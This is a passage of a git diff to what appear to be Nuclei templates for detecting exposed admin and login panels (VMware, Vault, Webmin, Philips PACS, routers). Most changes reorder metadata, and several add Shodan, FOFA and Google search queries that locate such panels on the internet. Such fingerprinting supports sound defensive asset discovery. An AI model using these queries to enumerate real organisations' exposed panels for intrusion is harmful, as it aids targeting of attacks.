vendor: untangle verified: true + max-request: 2 + vendor: untangle + product: ng_firewall + shodan-query: + - title:"Untangle Administrator Login" + - http.title:"untangle administrator login" + fofa-query: title="untangle administrator login" + google-query: intitle:"untangle administrator login" tags: panel,untangle,admin,login http: diff --git a/http/exposed-panels/uptime-kuma-panel.yaml b/http/exposed-panels/uptime-kuma-panel.yaml index c17bc03bce..9b9b86cd54 100644 --- a/http/exposed-panels/uptime-kuma-panel.yaml +++ b/http/exposed-panels/uptime-kuma-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/louislam/uptime-kuma - https://github.com/louislam/uptime-kuma/wiki metadata: + verified: true max-request: 1 shodan-query: title:"Uptime Kuma" - verified: true tags: uptime,kuma,panel,login,detect http: diff --git a/http/exposed-panels/v2924-admin-panel.yaml b/http/exposed-panels/v2924-admin-panel.yaml index 23573436a5..a83409ca37 100644 --- a/http/exposed-panels/v2924-admin-panel.yaml +++ b/http/exposed-panels/v2924-admin-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"V2924" - verified: true tags: panel,v2924 http: diff --git a/http/exposed-panels/vault-panel.yaml b/http/exposed-panels/vault-panel.yaml index 4d8a4a720a..9e94d64469 100644 --- a/http/exposed-panels/vault-panel.yaml +++ b/http/exposed-panels/vault-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:hashicorp:vault:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 + vendor: hashicorp product: vault shodan-query: http.favicon.hash:-919788577 - vendor: hashicorp - verified: true + fofa-query: icon_hash=-919788577 tags: panel,vault,detect,hashicorp http: diff --git a/http/exposed-panels/veeam-backup-gcp.yaml b/http/exposed-panels/veeam-backup-gcp.yaml index ecbe9297f7..ed8181530b 100644 --- a/http/exposed-panels/veeam-backup-gcp.yaml +++ b/http/exposed-panels/veeam-backup-gcp.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Veeam Backup for GCP" - verified: true tags: panel,google,cloud http: diff --git a/http/exposed-panels/veriz0wn-osint.yaml b/http/exposed-panels/veriz0wn-osint.yaml index c2c97ed9c6..fd7add9056 100644 --- a/http/exposed-panels/veriz0wn-osint.yaml +++ b/http/exposed-panels/veriz0wn-osint.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: info metadata: + verified: true max-request: 1 shodan-query: title:"Veriz0wn" - verified: true tags: veriz0wn,panel http: diff --git a/http/exposed-panels/verizon-router-panel.yaml b/http/exposed-panels/verizon-router-panel.yaml index 2ffeeb60b4..e0765fcc8a 100644 --- a/http/exposed-panels/verizon-router-panel.yaml +++ b/http/exposed-panels/verizon-router-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Verizon Router" - verified: true tags: panel,verizon,router http: diff --git a/http/exposed-panels/versa/versa-director-login.yaml b/http/exposed-panels/versa/versa-director-login.yaml index 989694d0c6..b716d40fa7 100644 --- a/http/exposed-panels/versa/versa-director-login.yaml +++ b/http/exposed-panels/versa/versa-director-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"VERSA DIRECTOR Login" - verified: true tags: panel,versa,director http: diff --git a/http/exposed-panels/versa/versa-flexvnf-panel.yaml b/http/exposed-panels/versa/versa-flexvnf-panel.yaml index a95bc6df9d..2b44843199 100644 --- a/http/exposed-panels/versa/versa-flexvnf-panel.yaml +++ b/http/exposed-panels/versa/versa-flexvnf-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Flex VNF Web-UI" - verified: true tags: panel,versa,flexvnf http: diff --git a/http/exposed-panels/vertex-tax-panel.yaml b/http/exposed-panels/vertex-tax-panel.yaml index eea0f2e2f1..e91b894b22 100644 --- a/http/exposed-panels/vertex-tax-panel.yaml +++ b/http/exposed-panels/vertex-tax-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Vertex Tax Installer" - verified: true tags: panel,vertex http: diff --git a/http/exposed-panels/vinchin-panel.yaml b/http/exposed-panels/vinchin-panel.yaml index d5795960f6..a091bb3702 100644 --- a/http/exposed-panels/vinchin-panel.yaml +++ b/http/exposed-panels/vinchin-panel.yaml @@ -8,9 +8,9 @@ info: classification: cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"VinChin" - verified: true tags: panel,vinchin,login http: diff --git a/http/exposed-panels/virtua-software-panel.yaml b/http/exposed-panels/virtua-software-panel.yaml index d0dccf0088..39fa14dfd7 100644 --- a/http/exposed-panels/virtua-software-panel.yaml +++ b/http/exposed-panels/virtua-software-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: virtuasoftware product: cobranca shodan-query: http.favicon.hash:876876147 - vendor: virtuasoftware - verified: true + fofa-query: icon_hash=876876147 tags: panel,virtua,virtuasoftware http: diff --git a/http/exposed-panels/vistaweb-panel.yaml b/http/exposed-panels/vistaweb-panel.yaml index 65da46c490..690b2c7d70 100644 --- a/http/exposed-panels/vistaweb-panel.yaml +++ b/http/exposed-panels/vistaweb-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://resa.aero/solutions-operations-facturation/vista-web/ metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,vistaweb,login http: diff --git a/http/exposed-panels/vmware-carbon-black-edr.yaml b/http/exposed-panels/vmware-carbon-black-edr.yaml index e20de1d02c..fbb41ec828 100644 --- a/http/exposed-panels/vmware-carbon-black-edr.yaml +++ b/http/exposed-panels/vmware-carbon-black-edr.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"VMware Carbon Black EDR" - verified: true tags: panel,vmware http: diff --git a/http/exposed-panels/vmware-cloud-availability.yaml b/http/exposed-panels/vmware-cloud-availability.yaml index 353f696c58..115145e512 100644 --- a/http/exposed-panels/vmware-cloud-availability.yaml +++ b/http/exposed-panels/vmware-cloud-availability.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"VMware Cloud Director Availability" - verified: true tags: panel,vmware http: diff --git a/http/exposed-panels/vmware-cloud-director.yaml b/http/exposed-panels/vmware-cloud-director.yaml index 1380db447f..841f738cc9 100644 --- a/http/exposed-panels/vmware-cloud-director.yaml +++ b/http/exposed-panels/vmware-cloud-director.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:vmware:cloud_director:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: cloud_director - shodan-query: title:"Welcome to VMware Cloud Director" - vendor: vmware verified: true + max-request: 1 + vendor: vmware + product: cloud_director + shodan-query: + - title:"Welcome to VMware Cloud Director" + - http.title:"welcome to vmware cloud director" + fofa-query: title="welcome to vmware cloud director" + google-query: intitle:"welcome to vmware cloud director" tags: panel,vmware http: diff --git a/http/exposed-panels/vmware-ftp-server.yaml b/http/exposed-panels/vmware-ftp-server.yaml index 05864f2e07..b3f7a7ec66 100644 --- a/http/exposed-panels/vmware-ftp-server.yaml +++ b/http/exposed-panels/vmware-ftp-server.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"VMWARE FTP SERVER" - verified: true tags: panel,vmware,ftp http: diff --git a/http/exposed-panels/vmware-hcx-login.yaml b/http/exposed-panels/vmware-hcx-login.yaml index a9389f2959..cf2b2eaa84 100644 --- a/http/exposed-panels/vmware-hcx-login.yaml +++ b/http/exposed-panels/vmware-hcx-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"VMware HCX" - verified: true tags: panel,vmware http: diff --git a/http/exposed-panels/vmware-horizon-daas.yaml b/http/exposed-panels/vmware-horizon-daas.yaml index 86a67e6f07..34bb35a4d9 100644 --- a/http/exposed-panels/vmware-horizon-daas.yaml +++ b/http/exposed-panels/vmware-horizon-daas.yaml @@ -7,11 +7,15 @@ info: classification: cpe: cpe:2.3:a:vmware:horizon_daas:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: horizon_daas - shodan-query: title:"Horizon DaaS" - vendor: vmware verified: true + max-request: 1 + vendor: vmware + product: horizon_daas + shodan-query: + - title:"Horizon DaaS" + - http.title:"horizon daas" + fofa-query: title="horizon daas" + google-query: intitle:"horizon daas" tags: panel,vmware http: diff --git a/http/exposed-panels/vmware-horizon-panel.yaml b/http/exposed-panels/vmware-horizon-panel.yaml index 43517b6cfc..0c80378c36 100644 --- a/http/exposed-panels/vmware-horizon-panel.yaml +++ b/http/exposed-panels/vmware-horizon-panel.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:vmware:horizon:*:*:*:*:macos:*:*:* metadata: max-request: 2 - product: horizon vendor: vmware + product: horizon tags: horizon,vmware,edb,panel http: diff --git a/http/exposed-panels/vmware-nsx-login.yaml b/http/exposed-panels/vmware-nsx-login.yaml index 064c28594d..0ee1e6ed9e 100644 --- a/http/exposed-panels/vmware-nsx-login.yaml +++ b/http/exposed-panels/vmware-nsx-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"vmw_nsx_logo-black-triangle-500w.png" - verified: true tags: panel,vmware http: diff --git a/http/exposed-panels/vmware-vcenter-converter-standalone.yaml b/http/exposed-panels/vmware-vcenter-converter-standalone.yaml index 0827631225..8d382cb834 100644 --- a/http/exposed-panels/vmware-vcenter-converter-standalone.yaml +++ b/http/exposed-panels/vmware-vcenter-converter-standalone.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:vmware:vcenter_converter_standalone:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: vcenter_converter_standalone - shodan-query: title:"VMware vCenter Converter Standalone" - vendor: vmware verified: true + max-request: 1 + vendor: vmware + product: vcenter_converter_standalone + shodan-query: + - title:"VMware vCenter Converter Standalone" + - http.title:"vmware vcenter converter standalone" + fofa-query: title="vmware vcenter converter standalone" + google-query: intitle:"vmware vcenter converter standalone" tags: panel,vmware,vcenter http: diff --git a/http/exposed-panels/vmware-vcloud-director.yaml b/http/exposed-panels/vmware-vcloud-director.yaml index 364fb6d974..8436c6124d 100644 --- a/http/exposed-panels/vmware-vcloud-director.yaml +++ b/http/exposed-panels/vmware-vcloud-director.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:vmware:vcloud_director:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: vcloud_director - shodan-query: title:"VMware vCloud Director" - vendor: vmware verified: true + max-request: 1 + vendor: vmware + product: vcloud_director + shodan-query: + - title:"VMware vCloud Director" + - http.title:"vmware vcloud director" + fofa-query: title="vmware vcloud director" + google-query: intitle:"vmware vcloud director" tags: panel,vmware,vcloud http: diff --git a/http/exposed-panels/vodafone-voxui-panel.yaml b/http/exposed-panels/vodafone-voxui-panel.yaml index 2f354b7a3d..3728e9b836 100644 --- a/http/exposed-panels/vodafone-voxui-panel.yaml +++ b/http/exposed-panels/vodafone-voxui-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Vodafone Vox UI" - verified: true tags: panel,vodafone http: diff --git a/http/exposed-panels/voipmonitor-panel.yaml b/http/exposed-panels/voipmonitor-panel.yaml index 7fb69c1226..e621be1ebe 100644 --- a/http/exposed-panels/voipmonitor-panel.yaml +++ b/http/exposed-panels/voipmonitor-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: voipmonitor - shodan-query: http.title:"VoIPmonitor" vendor: voipmonitor + product: voipmonitor + shodan-query: + - http.title:"VoIPmonitor" + - http.title:"voipmonitor" + fofa-query: title="voipmonitor" + google-query: intitle:"voipmonitor" tags: panel,voipmonitor,login http: diff --git a/http/exposed-panels/vrealize-loginsight-panel.yaml b/http/exposed-panels/vrealize-loginsight-panel.yaml index ae74bdb53b..26678bc772 100644 --- a/http/exposed-panels/vrealize-loginsight-panel.yaml +++ b/http/exposed-panels/vrealize-loginsight-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:vmware:vrealize_log_insight:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: vrealize_log_insight - shodan-query: title:"vRealize Log insight" - vendor: vmware verified: true + max-request: 1 + vendor: vmware + product: vrealize_log_insight + shodan-query: + - title:"vRealize Log insight" + - http.title:"vrealize log insight" + fofa-query: title="vrealize log insight" + google-query: intitle:"vrealize log insight" tags: panel,vmware,vrealize http: diff --git a/http/exposed-panels/vue-pacs-panel.yaml b/http/exposed-panels/vue-pacs-panel.yaml index c98e7e98cb..295b1571e3 100644 --- a/http/exposed-panels/vue-pacs-panel.yaml +++ b/http/exposed-panels/vue-pacs-panel.yaml @@ -11,11 +11,15 @@ info: classification: cpe: cpe:2.3:a:philips:vue_pacs:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: vue_pacs - shodan-query: http.title:"Vue PACS" - vendor: philips verified: true + max-request: 1 + vendor: philips + product: vue_pacs + shodan-query: + - http.title:"Vue PACS" + - http.title:"vue pacs" + fofa-query: title="vue pacs" + google-query: intitle:"vue pacs" tags: vue,pacs,panel,login,philips http: diff --git a/http/exposed-panels/wagtail-cms-detect.yaml b/http/exposed-panels/wagtail-cms-detect.yaml index f32b6c0a09..6300964646 100644 --- a/http/exposed-panels/wagtail-cms-detect.yaml +++ b/http/exposed-panels/wagtail-cms-detect.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: wagtail - shodan-query: title:"Wagtail - Sign in" - vendor: torchbox verified: true + max-request: 2 + vendor: torchbox + product: wagtail + shodan-query: + - title:"Wagtail - Sign in" + - http.title:"wagtail - sign in" + fofa-query: title="wagtail - sign in" + google-query: intitle:"wagtail - sign in" tags: panel,wagtail,torchbox http: diff --git a/http/exposed-panels/wampserver-homepage.yaml b/http/exposed-panels/wampserver-homepage.yaml index c1bbcb0af7..3be3a4dd14 100644 --- a/http/exposed-panels/wampserver-homepage.yaml +++ b/http/exposed-panels/wampserver-homepage.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"WAMPSERVER Homepage" - verified: true tags: panel,wampserver http: diff --git a/http/exposed-panels/watcher-panel.yaml b/http/exposed-panels/watcher-panel.yaml index d5085c80e8..53c5f0de21 100644 --- a/http/exposed-panels/watcher-panel.yaml +++ b/http/exposed-panels/watcher-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDK severity: info metadata: + verified: true max-request: 1 shodan-query: html:"/vsaas/v2/static/" - verified: true tags: panel,watcher,login http: diff --git a/http/exposed-panels/watchguard-panel.yaml b/http/exposed-panels/watchguard-panel.yaml index 6f1524d200..3f03d257fb 100644 --- a/http/exposed-panels/watchguard-panel.yaml +++ b/http/exposed-panels/watchguard-panel.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:h:watchguard:firebox_t15:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: firebox_t15 vendor: watchguard + product: firebox_t15 tags: watchguard,edb,panel http: diff --git a/http/exposed-panels/watershed-panel.yaml b/http/exposed-panels/watershed-panel.yaml index 3fcac1718e..e8fcfb0f09 100644 --- a/http/exposed-panels/watershed-panel.yaml +++ b/http/exposed-panels/watershed-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Watershed LRS" - verified: true tags: panel,watershed http: diff --git a/http/exposed-panels/wazuh-panel.yaml b/http/exposed-panels/wazuh-panel.yaml index 59e6fa9e21..332f94bbe1 100644 --- a/http/exposed-panels/wazuh-panel.yaml +++ b/http/exposed-panels/wazuh-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: wazuh - shodan-query: http.title:"Wazuh" vendor: wazuh + product: wazuh + shodan-query: + - http.title:"Wazuh" + - http.title:"wazuh" + fofa-query: title="wazuh" + google-query: intitle:"wazuh" tags: panel,wazuh,login http: diff --git a/http/exposed-panels/wd-mycloud-panel.yaml b/http/exposed-panels/wd-mycloud-panel.yaml index bb1df5c02f..37d14b2d5a 100644 --- a/http/exposed-panels/wd-mycloud-panel.yaml +++ b/http/exposed-panels/wd-mycloud-panel.yaml @@ -9,11 +9,12 @@ info: classification: cpe: cpe:2.3:a:western_digital:mycloud_nas:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: western_digital product: mycloud_nas shodan-query: http.favicon.hash:-1074357885 - vendor: western_digital - verified: true + fofa-query: icon_hash=-1074357885 tags: panel,login,mycloud,wd,detect,western_digital http: diff --git a/http/exposed-panels/web-file-manager.yaml b/http/exposed-panels/web-file-manager.yaml index 4a401c104e..5cf66d7dfa 100644 --- a/http/exposed-panels/web-file-manager.yaml +++ b/http/exposed-panels/web-file-manager.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Web File Manager" - verified: true tags: panel,filemanager http: diff --git a/http/exposed-panels/web-viewer-panel.yaml b/http/exposed-panels/web-viewer-panel.yaml index 969ddba294..3dfc1a201b 100644 --- a/http/exposed-panels/web-viewer-panel.yaml +++ b/http/exposed-panels/web-viewer-panel.yaml @@ -7,11 +7,15 @@ info: classification: cpe: cpe:2.3:h:samsung:dvr:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: dvr - shodan-query: title:"Web Viewer for Samsung DVR" - vendor: samsung verified: true + max-request: 1 + vendor: samsung + product: dvr + shodan-query: + - title:"Web Viewer for Samsung DVR" + - http.title:"web viewer for samsung dvr" + fofa-query: title="web viewer for samsung dvr" + google-query: intitle:"web viewer for samsung dvr" tags: panel,web-viewer,detect,samsung http: diff --git a/http/exposed-panels/webcomco-panel.yaml b/http/exposed-panels/webcomco-panel.yaml index ee48997e5f..053dd03adc 100644 --- a/http/exposed-panels/webcomco-panel.yaml +++ b/http/exposed-panels/webcomco-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=626548889515634&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: title:"WebcomCo" - verified: true tags: panel,webcomco,login http: diff --git a/http/exposed-panels/webeditors-check-detect.yaml b/http/exposed-panels/webeditors-check-detect.yaml index adc9cd4ea9..d663e1c1fb 100644 --- a/http/exposed-panels/webeditors-check-detect.yaml +++ b/http/exposed-panels/webeditors-check-detect.yaml @@ -11,8 +11,9 @@ info: cpe: cpe:2.3:a:ckeditor:ckeditor:*:*:*:*:drupal:*:*:* metadata: max-request: 17 - product: ckeditor vendor: ckeditor + product: ckeditor + shodan-query: cpe:"cpe:2.3:a:ckeditor:ckeditor" tags: panel,webeditors,ckeditor http: diff --git a/http/exposed-panels/weblogic-login.yaml b/http/exposed-panels/weblogic-login.yaml index 2b8df9e0ec..35394d080f 100644 --- a/http/exposed-panels/weblogic-login.yaml +++ b/http/exposed-panels/weblogic-login.yaml @@ -11,9 +11,14 @@ info: cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:-:*:*:* metadata: max-request: 1 - product: weblogic_server - shodan-query: product:"Oracle Weblogic" vendor: oracle + product: weblogic_server + shodan-query: + - product:"Oracle Weblogic" + - product:"oracle weblogic" + - http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: panel,oracle,weblogic,login http: diff --git a/http/exposed-panels/weblogic-uddiexplorer.yaml b/http/exposed-panels/weblogic-uddiexplorer.yaml index aff2439bc0..75f0aa4ee3 100644 --- a/http/exposed-panels/weblogic-uddiexplorer.yaml +++ b/http/exposed-panels/weblogic-uddiexplorer.yaml @@ -14,8 +14,13 @@ info: cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:-:*:*:* metadata: max-request: 1 - product: weblogic_server vendor: oracle + product: weblogic_server + shodan-query: + - product:"oracle weblogic" + - http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: panel,oracle,weblogic,tenable http: diff --git a/http/exposed-panels/webmin-panel.yaml b/http/exposed-panels/webmin-panel.yaml index 404fc08ef9..46e05771e9 100644 --- a/http/exposed-panels/webmin-panel.yaml +++ b/http/exposed-panels/webmin-panel.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: webmin vendor: webmin + product: webmin + shodan-query: http.title:"webmin" + fofa-query: title="webmin" + google-query: intitle:"webmin" tags: panel,webmin http: diff --git a/http/exposed-panels/webmodule-ee-panel.yaml b/http/exposed-panels/webmodule-ee-panel.yaml index 0ac4f553f3..80448adae9 100644 --- a/http/exposed-panels/webmodule-ee-panel.yaml +++ b/http/exposed-panels/webmodule-ee-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version" max-request: 1 shodan-query: title:"Webmodule" + google-query: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version" tags: edb,panel,webmodule-ee,login http: diff --git a/http/exposed-panels/webroot-login.yaml b/http/exposed-panels/webroot-login.yaml index 0ed2988957..da2df0bf92 100644 --- a/http/exposed-panels/webroot-login.yaml +++ b/http/exposed-panels/webroot-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Webroot - Login" - verified: true tags: panel,webroot http: diff --git a/http/exposed-panels/webshell4-login-panel.yaml b/http/exposed-panels/webshell4-login-panel.yaml index 4bf6ba2908..78049c2ea0 100644 --- a/http/exposed-panels/webshell4-login-panel.yaml +++ b/http/exposed-panels/webshell4-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"webshell4" - verified: true tags: webshell4,panel http: diff --git a/http/exposed-panels/webtitan-cloud-panel.yaml b/http/exposed-panels/webtitan-cloud-panel.yaml index 877a0cb34d..f6ed62d2f7 100644 --- a/http/exposed-panels/webtitan-cloud-panel.yaml +++ b/http/exposed-panels/webtitan-cloud-panel.yaml @@ -9,12 +9,15 @@ info: classification: cpe: cpe:2.3:a:titanhq:webtitan:*:*:*:*:*:*:*:* metadata: - fofa-query: title="WebTitan" + verified: true max-request: 1 + vendor: titanhq product: webtitan shodan-query: http.favicon.hash:1090061843 - vendor: titanhq - verified: true + fofa-query: + - title="WebTitan" + - title="webtitan" + - icon_hash=1090061843 tags: panel,webtitan,cloud,detect,titanhq http: diff --git a/http/exposed-panels/webtransfer-client-panel.yaml b/http/exposed-panels/webtransfer-client-panel.yaml index a7451ec0cd..c834e71edc 100644 --- a/http/exposed-panels/webtransfer-client-panel.yaml +++ b/http/exposed-panels/webtransfer-client-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.progress.com/ftp-server/web-transfer metadata: + verified: true max-request: 1 shodan-query: http.title:"Web Transfer Client" - verified: true tags: panel,webtransferclient,login,detect http: diff --git a/http/exposed-panels/webuzo-admin-panel.yaml b/http/exposed-panels/webuzo-admin-panel.yaml index 9d8cc06823..16a3fb9b14 100644 --- a/http/exposed-panels/webuzo-admin-panel.yaml +++ b/http/exposed-panels/webuzo-admin-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:softaculous:webuzo:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: webuzo - shodan-query: http.title:"Webuzo - Admin Panel" - vendor: softaculous verified: true + max-request: 1 + vendor: softaculous + product: webuzo + shodan-query: + - http.title:"Webuzo - Admin Panel" + - http.title:"webuzo - admin panel" + fofa-query: title="webuzo - admin panel" + google-query: intitle:"webuzo - admin panel" tags: panel,webuzo,admin,softaculous http: diff --git a/http/exposed-panels/weiphp-panel.yaml b/http/exposed-panels/weiphp-panel.yaml index ec961a18bd..e38b33a0ec 100644 --- a/http/exposed-panels/weiphp-panel.yaml +++ b/http/exposed-panels/weiphp-panel.yaml @@ -10,11 +10,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:weiphp:weiphp:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: weiphp - shodan-query: http.html:"weiphp" - vendor: weiphp verified: true + max-request: 1 + vendor: weiphp + product: weiphp + shodan-query: + - http.html:"weiphp" + - http.html:"weiphp5.0" + fofa-query: + - body="weiphp" + - body="weiphp5.0" tags: panel,weiphp http: diff --git a/http/exposed-panels/whm-login-detect.yaml b/http/exposed-panels/whm-login-detect.yaml index 60fe019818..36cf21f6c8 100644 --- a/http/exposed-panels/whm-login-detect.yaml +++ b/http/exposed-panels/whm-login-detect.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:cpanel:whm:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: whm vendor: cpanel + product: whm tags: edb,whm,panel,login,cpanel http: diff --git a/http/exposed-panels/wiren-board-webui.yaml b/http/exposed-panels/wiren-board-webui.yaml index cc38517952..caf4edf84a 100644 --- a/http/exposed-panels/wiren-board-webui.yaml +++ b/http/exposed-panels/wiren-board-webui.yaml @@ -10,9 +10,9 @@ info: cvss-score: 6.5 cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Wiren Board Web UI" - verified: true tags: panel,exposure,wiren http: diff --git a/http/exposed-panels/wmw-enterprise-panel.yaml b/http/exposed-panels/wmw-enterprise-panel.yaml index 1557b670d8..cc87cd1503 100644 --- a/http/exposed-panels/wmw-enterprise-panel.yaml +++ b/http/exposed-panels/wmw-enterprise-panel.yaml @@ -12,8 +12,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,wmw,detect http: diff --git a/http/exposed-panels/wordpress-login.yaml b/http/exposed-panels/wordpress-login.yaml index 2c28cd0e62..7377b08141 100644 --- a/http/exposed-panels/wordpress-login.yaml +++ b/http/exposed-panels/wordpress-login.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: wordpress vendor: wordpress + product: wordpress + shodan-query: + - http.component:"wordpress" + - cpe:"cpe:2.3:a:wordpress:wordpress" tags: panel,wordpress http: diff --git a/http/exposed-panels/workspace-one-uem.yaml b/http/exposed-panels/workspace-one-uem.yaml index 3939879875..8825d78738 100644 --- a/http/exposed-panels/workspace-one-uem.yaml +++ b/http/exposed-panels/workspace-one-uem.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:vmware:workspace_one_uem:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: workspace_one_uem - shodan-query: http.html:"Airwatch" - vendor: vmware verified: true + max-request: 1 + vendor: vmware + product: workspace_one_uem + shodan-query: + - http.html:"Airwatch" + - http.html:"airwatch" + fofa-query: body="airwatch" tags: panel,workspaceone,vmware http: diff --git a/http/exposed-panels/wowza-streaming-engine.yaml b/http/exposed-panels/wowza-streaming-engine.yaml index 52f781e362..02102f55ba 100644 --- 